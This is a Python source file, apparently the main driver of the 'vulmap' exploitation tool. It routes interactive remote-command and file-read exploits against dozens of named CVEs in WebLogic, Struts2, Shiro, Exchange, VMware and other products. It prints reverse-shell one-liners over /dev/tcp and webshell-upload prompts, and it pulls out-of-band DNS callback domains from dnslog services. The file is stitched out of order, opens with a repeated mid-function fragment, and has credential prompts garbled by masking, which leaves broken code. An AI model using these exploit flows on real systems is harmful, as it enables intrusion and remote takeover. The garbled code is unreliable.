elif vul_num == "S2-057" or vul_num == "s2-057":
exp_apache_struts2.s2_057_exp(cmd)
elif vul_num == "S2-059" or vul_num == "s2-059":
exp_apache_struts2.s2_059_exp(cmd)
elif vul_num == "S2-061" or vul_num == "s2-061":
exp_apache_struts2.s2_061_exp(cmd)
elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
exp_apache_struts2.s2_devMode_exp(cmd)
elif vul_num == "1.2.24":
print(rmi_ldap)
exp_fastjson.fastjson_1224_exp(cmd)
elif vul_num == "1.2.47":
print(rmi_ldap)
exp_fastjson.fastjson_1247_exp(cmd)
elif vul_num == "1.2.62":
print(rmi_ldap)
exp_fastjson.fastjson_1262_exp(cmd)
else:
pass
def require():
pwd_vulmap = os.path.split(os.path.realpath(sys.argv[0]))[0]
def install_gevent():
input_gevent = input(
now.timed(de=0) + color.yel_info() + color.yellow(
" Gevent dependency not found, install it now (y/n): "))
if input_gevent == "y":
try:
pwd_packages = sysconfig.get_paths()["purelib"]
os.chdir(pwd_vulmap)
gevent_tar = "./thirdparty/gevent.tar.gz"
t = tarfile.open(gevent_tar)
t.extractall(path=pwd_packages)
pwd_gevent = pwd_packages + "/gevent"
os.chdir(pwd_gevent)
try:
if os.system(
"python3 setup.py install >> /dev/null 2>&1") == 0:
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" gevent install to: " +
pwd_packages))
print(
now.timed(de=0) + color.yel_info() + color.yellow(
" gevent dependency installation is complete"))
#print(now.timed(de=0) + color.red_warn() + color.yellow(
# " Permission denied, need root permissions to install"))
#if os.system("sudo python3 setup.py install") == 0:
# print(now.timed(de=0) + color.yel_info() + color.yellow(" Gevent install to: " + pwd_packages))
# print(now.timed(de=0) + color.yel_info() + color.yellow(
# " Gevent dependency installation is complete"))
except:
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" gevent installation failed, please use \" pip3 install gevent\" to install"
))
except Exception as error:
if r"Permission" in str(error):
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Permission denied: Need root privileges or \"sudo xxxx\""
))
# print(now.timed(de=0) + color.red("[ERROR] " + error.__traceback__.tb_frame.f_globals['__file__']
# + " " + str(error.__traceback__.tb_lineno)))
def install_crypto():
input_crypto = input(
now.timed(de=0) + color.yel_info() + color.yellow(
" pycryptodome dependency not found, install it now (y/n): "))
if input_crypto == "y":
try:
pwd_packages = sysconfig.get_paths()["purelib"]
os.chdir(pwd_vulmap)
pycryptodome_tar = "./thirdparty/pycryptodome.tar.gz"
t = tarfile.open(pycryptodome_tar)
t.extractall(path=pwd_packages)
pwd_crypto = pwd_packages + "/pycryptodome"
os.chdir(pwd_crypto)
try:
if os.system(
"python3 setup.py install >> /dev/null 2>&1") == 0:
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" pycryptodome install to: " +
pwd_packages))
print(
now.timed(de=0) + color.yel_info() + color.yellow(
" Crypto dependency installation is complete"))
#print(now.timed(de=0) + color.red_warn() + color.yellow(
# " Permission denied, need root permissions to install"))
#if os.system("sudo python3 setup.py install") == 0:
# print(now.timed(de=0) + color.yel_info() + color.yellow(" pycryptodome install to: " + pwd_packages))
# print(now.timed(de=0) + color.yel_info() + color.yellow(
# " pycryptodome dependency installation is complete"))
except:
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Crypto installation failed, please use \" pip3 install pycryptodome\" to install"
))
except Exception as error:
if r"Permission" in str(error):
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Permission denied: Need root privileges or \"sudo xxxx\""
))
require_list = []
try:
from gevent import monkey
monkey.patch_all()
except ImportError as e:
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Not find \"gevent\", please use \" pip3 install -r requirements.txt\" to install"
))
exit(0)
#if r"gevent" in str(e):
# require_list.append("gevent")
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
except ImportError as e:
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Not find \"pycryptodome\", please use \" pip3 install -r requirements.txt\" to install"
))
exit(0)
#require_list.append("crypto")
if r"gevent" in require_list and r"crypto" in require_list:
print(banner()) # 显示随机banner
install_gevent()
install_crypto()
exit(0)
if r"gevent" in require_list:
print(banner()) # 显示随机banner
install_gevent()
exit(0)
if r"crypto" in require_list:
print(banner()) # 显示随机banner
install_crypto()
exit(0)
def output_json(filename, data):
vul_data = data["vul_data"]
raw_data = []
try:
if r">_<" in vul_data:
vul_requ = vul_data
vul_resp = vul_data
vul_path = ""
else:
raw_data.append(vul_data)
vul_requ = re.findall(r'([\s\S]*)\r\n> HTTP/', raw_data[0])[0]
vul_requ = vul_requ.replace("< ", "")
vul_resp = re.findall(r'\r\n> HTTP/([\s\S]*)', raw_data[0])[0]
vul_resp = "HTTP/" + vul_resp.replace("> ", "")
vul_path = re.findall(r' /(.*) HTTP', raw_data[0])[0]
except Exception as error:
print(
now.timed(de=0) +
color.red("[ERROR] " +
error.__traceback__.tb_frame.f_globals['__file__'] +
" " + str(error.__traceback__.tb_lineno)))
vul_path = ""
vul_requ = ""
vul_resp = ""
try:
vul_urls = data["vul_urls"]
host_port = urlparse(vul_urls)
vul_host = host_port.hostname
vul_port = host_port.port
# vul_u = vul_host + ":" + str(vul_port)
if vul_port is None and r"https://" in vul_urls:
vul_port = 443
elif vul_port is None and r"http://" in vul_urls:
vul_port = 80
if r"https://" in vul_urls:
if vul_port is not None:
vul_u = "https://" + vul_host + ":" + str(
vul_port) + "/" + vul_path
else:
vul_u = "https://" + vul_host + "/" + vul_path
elif r"http://" in vul_urls:
if vul_port is not None:
vul_u = "http://" + vul_host + ":" + str(
vul_port) + "/" + vul_path
else:
vul_u = "http://" + vul_host + "/" + vul_path
else:
vul_u = "http://" + vul_host + "/" + vul_path
prt_name = data["prt_name"]
vul_payd = data["vul_payd"]
vul_type = data["vul_type"]
vul_auth = data["cre_auth"]
vul_desc = data["vul_name"]
vul_date = int(round(time.time() * 1000))
json_result = []
json_data = {
"create_time": vul_date,
"detail": {
"author": vul_auth,
"description": vul_desc,
"host": vul_host,
"param": {},
"payload": vul_payd,
"port": vul_port,
"request": vul_requ,
"response": vul_resp,
"url": vul_u
},
"plugin": prt_name,
"target": {
"url": vul_urls
},
"vuln_class": vul_type
}
json_result.append(json_data)
def write_json(obj):
item_list = []
if os.path.isfile(filename):
with open(filename, 'r') as f:
load_dict = json.load(f)
num_item = len(load_dict)
for i in range(num_item):
create_time = load_dict[i]['create_time']
author = load_dict[i]['detail']['author']
description = load_dict[i]['detail']['description']
host = load_dict[i]['detail']['host']
param = load_dict[i]['detail']['param']
payload = load_dict[i]['detail']['payload']
port = load_dict[i]['detail']['port']
request = load_dict[i]['detail']['request']
response = load_dict[i]['detail']['response']
url_1 = load_dict[i]['detail']['url']
plugin = load_dict[i]['plugin']
url_2 = load_dict[i]['target']['url']
vuln_class = load_dict[i]['vuln_class']
json_dict = {
"create_time": create_time,
"detail": {
"author": author,
"description": description,
"host": host,
"param": param,
"payload": payload,
"port": port,
"request": request,
"response": response,
"url": url_1
},
"plugin": plugin,
"target": {
"url": url_2
},
"vuln_class": vuln_class
}
item_list.append(json_dict)
else:
with open(filename, 'w', encoding='utf-8') as f2:
json.dump(json_result, f2, indent=4, ensure_ascii=False)
item_list.append(obj)
with open(filename, 'w', encoding='utf-8') as f2:
json.dump(item_list, f2, indent=4, ensure_ascii=False)
write_json(json_data)
except Exception as error:
print(
now.timed(de=0) +
color.red("[ERROR] " +
error.__traceback__.tb_frame.f_globals['__file__'] +
" " + str(error.__traceback__.tb_lineno)))
def timeout_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
print(
now.timed(de=delay) + color.red_warn() +
color.cyan(" " + prt_name + " check failed because timeout !!!"))
def identify_prt(name):
print("\r{0}{1}{2}".format(
now.timed(de=0), color.yel_info(),
color.cyan(" Identify whether the target is: " +
color.magenta(name))),
end=" ")
def exploit(target, vul_num):
target = url_check(target)
if survival_check(target) == "f":
print(
now.timed(de=0) + color.red_warn() +
color.red(" Survival check failed: " + target))
exit(0)
delay = globals.get_value("DELAY") # 获取全局变量DELAY
exp_apache_shiro = ApacheShiro(target)
exp_apache_solr = ApacheSolr(target)
exp_apache_tomcat = ApacheTomcat(target)
exp_elasticsearch = Elasticsearch(target)
exp_apache_flink = ApacheFlink(target)
exp_jenkins = Jenkins(target)
exp_spring = Spring(target)
exp_nexus = Nexus(target)
exp_oracle_weblogic = OracleWeblogic(target)
exp_redhat_jboss = RedHatJBoss(target)
exp_apache_unomi = ApacheUnomi(target)
exp_thinkphp = ThinkPHP(target)
exp_drupal = Drupal(target)
exp_fastjson = Fastjson(target)
exp_apache_struts2 = ApacheStruts2(target)
exp_apache_druid = ApacheDruid(target)
exp_laravel = Laravel(target)
exp_vmware = Vmware(target)
exp_saltstack = SaltStack(target)
exp_exchange = Exchange(target)
exp_big_ip = BIG_IP(target)
exp_apache_ofbiz = ApacheOFBiz(target)
print(
now.timed(de=delay) + color.yel_info() +
color.cyan(" Target url: " + target))
print(
now.timed(de=delay) + color.yel_info() +
color.cyan(" Use exploit modules: " + vul_num))
nc = now.timed(de=0) + color.yel_info() + color.yellow(
" input \"nc\" bounce linux shell")
up = now.timed(de=0) + color.yel_info() + color.yellow(
" input \"upload\" upload webshell")
rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
bash = now.timed(de=0) + color.yel_info() + color.yellow(
" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(
" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\""
)
cmd = "whoami" # 为了消除pycharm错误提示,没啥用
file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用
path = "/tmp/test" # 为了消除pycharm错误提示,没啥用
shiro_key = "1" # 为了消除pycharm错误提示,没啥用
shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用
nexus_u = "admin" # 为了消除pycharm错误提示,没啥用
nexus_p = "admin" # 为了消除pycharm错误提示,没啥用
laravel_key = "null" # 为了消除pycharm错误提示,没啥用
laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用
if vul_num not in explists:
print(
now.timed(de=0) + color.red_warn() + color.red(
" The vulnerability does not support exploitation. Please refer to \"--list\""
))
sys.exit(0)
elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
if os_check() == "linux" or os_check() == "other":
shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
shiro_gadget = input(
now.timed(de=delay) + color.green("[+] gadget: "))
elif os_check() == "windows":
shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: WEB-INF/web.xml"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_tomcat.cve_2020_1938_exp(file)
elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2019_3799_exp(file)
elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2020_5410_exp(file)
elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_flink.cve_2020_17519_exp(file)
elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
if os_check() == "linux" or os_check() == "other":
nexus_u = input(
now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
nexus_u = input(
now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
if os_check() == "linux" or os_check() == "other":
laravel_key = input(
now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
elif os_check() == "windows":
laravel_key = input(
now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
if os_check() == "linux" or os_check() == "other":
laravel_gadget = input(
now.timed(de=delay) + color.green(
"[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
elif os_check() == "windows":
laravel_gadget = input(
now.no_color_timed(de=delay) +
"[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
if os_check() == "linux" or os_check() == "other":
os_type = input(
now.timed(de=delay) +
color.green("[+] The target os type (linux/windows): "))
elif os_check() == "windows":
os_type = input(
now.no_color_timed(de=delay) +
"[+] The target os type (linux/windows): ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_vmware.cve_2021_21972_exp(cmd, os_type)
elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] upload file: "))
path = input(
now.timed(de=delay) +
color.green("[+] upload path (e.g. /tmp/test.txt): "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
path = input(
now.timed(de=delay) +
color.green("[+] upload path (e.g. /tmp/test.txt): "))
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_saltstack.cve_2021_25282_exp(cmd, file, path)
elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
if os_check() == "linux" or os_check() == "other":
email = input(now.timed(de=delay) + color.green("[+] email: "))
file = input(
now.timed(de=delay) +
color.green("[+] webshell name (e.g. shell.aspx): "))
elif os_check() == "windows":
email = input(now.timed(de=delay) + color.green("[+] email: "))
file = input(
now.no_color_timed(de=delay) +
"[+] uwebshell name (e.g. shell.aspx: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_exchange.cve_2021_27065_exp(cmd, file, email)
# 远程命令执行漏洞单独简单运行
else:
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
exit(0)
elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
exp_apache_tomcat.cve_2017_12615_exp(cmd)
elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
exp_elasticsearch.cve_2014_3120_exp(cmd)
elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
exp_elasticsearch.cve_2015_1427_exp(cmd)
elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
exp_jenkins.cve_2018_1000861_exp(cmd)
elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
exp_oracle_weblogic.cve_2017_3506_exp(cmd)
elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
print(nc)
print(up)
exp_oracle_weblogic.cve_2017_10271_exp(cmd)
elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
exp_oracle_weblogic.cve_2018_2894_exp(cmd)
elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
print(nc)
print(up)
exp_oracle_weblogic.cve_2019_2725_exp(cmd)
elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
print(nc)
exp_oracle_weblogic.cve_2019_2729_exp(cmd)
elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
exp_oracle_weblogic.cve_2020_2555_exp(cmd)
elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
exp_oracle_weblogic.cve_2020_2883_exp(cmd)
elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
exp_oracle_weblogic.cve_2020_14882_exp(cmd)
elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
exp_apache_solr.cve_2017_12629_exp(cmd)
elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
exp_apache_solr.cve_2019_17558_exp(cmd)
elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
exp_nexus.cve_2019_7238_exp(cmd)
elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
exp_redhat_jboss.cve_2010_0738_exp(cmd)
elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
exp_redhat_jboss.cve_2010_1428_exp(cmd)
elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
exp_redhat_jboss.cve_2015_7501_exp(cmd)
elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
exp_apache_unomi.cve_2020_13942_exp(cmd)
elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
print(up)
exp_thinkphp.cve_2019_9082_exp(cmd)
elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
exp_thinkphp.cve_2018_20062_exp(cmd)
elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
exp_drupal.cve_2018_7600_exp(cmd)
elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
exp_drupal.cve_2018_7602_exp(cmd)
elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
exp_drupal.cve_2019_6340_exp(cmd)
elif vul_num == "S2-005" or vul_num == "s2-005":
exp_apache_struts2.s2_005_exp(cmd)
elif vul_num == "S2-008" or vul_num == "s2-008":
exp_apache_struts2.s2_008_exp(cmd)
elif vul_num == "S2-009" or vul_num == "s2-009":
exp_apache_struts2.s2_009_exp(cmd)
elif vul_num == "S2-013" or vul_num == "s2-013":
exp_apache_struts2.s2_013_exp(cmd)
elif vul_num == "S2-015" or vul_num == "s2-015":
exp_apache_struts2.s2_015_exp(cmd)
elif vul_num == "S2-016" or vul_num == "s2-016":
exp_apache_struts2.s2_016_exp(cmd)
elif vul_num == "S2-029" or vul_num == "s2-029":
exp_apache_struts2.s2_029_exp(cmd)
elif vul_num == "S2-032" or vul_num == "s2-032":
exp_apache_struts2.s2_032_exp(cmd)
elif vul_num == "S2-045" or vul_num == "s2-045":
exp_apache_struts2.s2_045_exp(cmd)
elif vul_num == "S2-046" or vul_num == "s2-046":
exp_apache_struts2.s2_046_exp(cmd)
elif vul_num == "S2-048" or vul_num == "s2-048":
exp_apache_struts2.s2_048_exp(cmd)
elif vul_num == "S2-052" or vul_num == "s2-052":
exp_apache_struts2.s2_052_exp(cmd)
elif vul_num == "S2-057" or vul_num == "s2-057":
exp_apache_struts2.s2_057_exp(cmd)
elif vul_num == "S2-059" or vul_num == "s2-059":
exp_apache_struts2.s2_059_exp(cmd)
elif vul_num == "S2-061" or vul_num == "s2-061":
exp_apache_struts2.s2_061_exp(cmd)
elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
exp_apache_struts2.s2_devMode_exp(cmd)
elif vul_num == "1.2.24":
print(rmi_ldap)
exp_fastjson.fastjson_1224_exp(cmd)
elif vul_num == "1.2.47":
print(rmi_ldap)
exp_fastjson.fastjson_1247_exp(cmd)
elif vul_num == "1.2.62":
print(rmi_ldap)
exp_fastjson.fastjson_1262_exp(cmd)
elif vul_num == "CVE-2021-25646":
print(bash_2)
exp_apache_druid.cve_2021_25646_exp(cmd)
elif vul_num == "CVE-2021-22986":
exp_big_ip.cve_2021_22986_exp(cmd)
elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
exp_big_ip.cve_2020_5902_exp(cmd)
elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
print(
now.timed(de=delay) + color.yel_info() + color.yellow(
" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"
))
exp_apache_ofbiz.cve_2021_26295_exp(cmd)
else:
pass
def connection_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
print(
now.timed(de=delay) + color.red_warn() +
color.cyan(" " + prt_name +
" check failed because unable to connect !!!"))
def dns_request():
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
dnslog = globals.get_value("DNSLOG") # 获取全局变量DNSLOG
#print(dnslog)
def ceye_io():
ceye_host = globals.get_value("ceye_domain")
ceye_token = globals.get_value("ceye_token")
if r"xxxxxx" not in ceye_host:
dns_host = random_md5() + "." + ceye_host
return dns_host
def dnslog_cn():
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
d_p = globals.get_value("DNS_DNSLOG_HOST")
try:
if d_p is None:
dns = requests.get(dnslog_api,
headers=headers_dnslog,
timeout=timeout,
verify=False)
dns_host = random_md5() + "." + dns.text
globals.set_value("DNS_DNSLOG_HOST", dns.text)
return dns_host
else:
dns_host = random_md5() + "." + globals.get_value(
"DNS_DNSLOG_HOST")
return dns_host
except Exception:
return "error"
def hyuga_co():
headers_hyuga = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language':
'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
}
hyuga_api = "http://api.hyuga.co/v1/users"
hyuga_host = globals.get_value("hyuga_domain")
hyuga_token = globals.get_value("hyuga_token")
try:
if r"xxxxxx" in hyuga_host: # 如果没有指定域名和token,就自动获取, 第一次获取token
if r"xxxxxx" in hyuga_token:
dns = requests.post(hyuga_api,
headers=headers_hyuga,
timeout=timeout,
verify=False)
hyuga_host = json.loads(dns.text)["data"]["identity"]
dns_host = random_md5() + "." + str(hyuga_host)
hyuga_token = json.loads(dns.text)["data"]["token"]
globals.set_value("hyuga_token", hyuga_token)
globals.set_value("hyuga_domain", hyuga_host)
return dns_host
else:
return "bug"
else:
dns_host = random_md5() + "." + hyuga_host
return dns_host
except Exception as e:
pass
if dnslog == "auto":
if hyuga_co(): # 判断dns平台是否可用时调用一次,仅存活测试
dns_req = hyuga_co()
globals.set_value("AUTO_DNSLOG", "hyuga")
return dns_req
elif dnslog_cn(): # 判断dns平台是否可用时调用一次,仅存活测试
dns_req = dnslog_cn()
globals.set_value("AUTO_DNSLOG", "dnslog")
return dns_req
elif ceye_io():
dns_req = ceye_io()
globals.set_value("AUTO_DNSLOG", "ceye")
return dns_req
else:
print(
now.timed(de=0) + color.red_warn() + color.red(
" The dnslog platform cannot be used, please check the current network"
))
return "no dnslog"
elif r"hyuga" in dnslog:
dns_req = hyuga_co()
#globals.set_value("DNSLOG", "hyuga")
return str(dns_req)
elif r"dnslog" in dnslog:
dns_req = dnslog_cn()
#globals.set_value("DNSLOG", "dnslog")
return dns_req
elif r"ceye" in dnslog:
ceye_host = globals.get_value("ceye_domain")
if r"xxxxxx" in ceye_host:
print(
now.timed(de=0) + color.red_warn() + color.red(
" Ceye.io domain and token are incorrectly configured"))
exit(0)
dns_req = ceye_io()
#globals.set_value("DNSLOG", "ceye")
return dns_req
else:
return "no dnslog"
globals.set_value("TIMEOUT", args.TIMEOUT) # 设置全局变量超时时间TOMEOUT
globals.set_value("THREADNUM", args.thread_num) # 设置全局变量THREADNUM传递线程数量
# 替换自己的 ceye.io 的域名和 token
globals.set_value("ceye_domain", "xxxxxxxxxx")
globals.set_value("ceye_token", "xxxxxxxxxx")
# 替换自己的 http://hyuga.co 的域名和 token
# hyuga的域名和token可写可不写,如果不写则自动获得
globals.set_value("hyuga_domain", "xxxxxxxxxx")
globals.set_value("hyuga_token", "xxxxxxxxxx")
# fofa 邮箱和 key,需要手动修改为自己的
globals.set_value("fofa_email", "xxxxxxxxxx")
globals.set_value("fofa_key", "xxxxxxxxxx")
# shodan key
globals.set_value("shodan_key", "xxxxxxxxxx")
if __name__ == '__main__':
try:
vulmap_license() # vulmap 用户协议及免责声明
args = arg() # 初始化各选项参数
config() # 加载全局变量
version_check() # 检查vulmap版本
core.control_options(args) # 运行核心选项控制方法用于处理不同选项并开始扫描
except KeyboardInterrupt as e:
print(now.timed(de=0) + color.red_warn() + color.red(" Stop scanning"))
exit(0)
def vulmap_license():
pwd_vulmap = os.path.split(os.path.realpath(sys.argv[0]))[0]
licenses = pwd_vulmap + "/module/licenses/licenses.txt"
if os.path.isfile(licenses):
pass
else:
print(
color.white("Add the following " + color.yellow(
"disclaimer"
) + color.white(
" to the original agreement (https://github.com/zhzyker/vulmap/blob/main/LICENSE). In case of conflict with the original agreement, the "
+ color.yellow("disclaimer") +
color.white(" shall prevail.\n"))))
print(
color.white(
"Unauthorized commercial use of this tool is prohibited, and unauthorized commercial use after secondary development is prohibited\n\n"
"This tool is only for legally authorized corporate security construction activities. When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization.\n\n"
"If you have any illegal behavior in the process of using this tool, you need to bear the corresponding consequences yourself, and we will not bear any legal and joint liabilities.\n\n"
"Before using this tool, please read carefully and fully understand the content of each clause. Restrictions, exemptions, or other clauses involving your major rights and interests may be bolded, underlined, etc. to remind you to pay attention. Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not use this tool. Your use behavior or your acceptance of this agreement in any other express or implied manner shall be deemed to have been read and agreed to be bound by this agreement.\n"
))
print(
color.white(
"------------------------------------------------------------------\n"
))
print(
color.white(
"在原有协议(https://github.com/zhzyker/vulmap/blob/main/LICENSE)中追加以下"
+ color.yellow("免责声明。") + color.white("若与原有协议冲突均以") +
color.yellow("免责声明") + color.white("为准。\n")))
print(
color.white(
"本工具禁止进行未授权商业用途,禁止二次开发后进行未授权商业用途\n\n"
"本工具仅面向合法授权的企业安全建设行为,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。\n\n"
"如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。\n\n"
"在使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。\n"
))
if os_check() == "linux" or os_check() == "other":
lic = input(
now.timed(de=0) +
color.yellow("[*] I accept the disclaimer (yes/no): "))
if lic == "yes" or lic == "y":
create_date = int(round(time.time() * 1000))
output_text(licenses, create_date)
else:
print(
now.timed(de=0) + color.red_warn() +
color.red(" Good Lucking"))
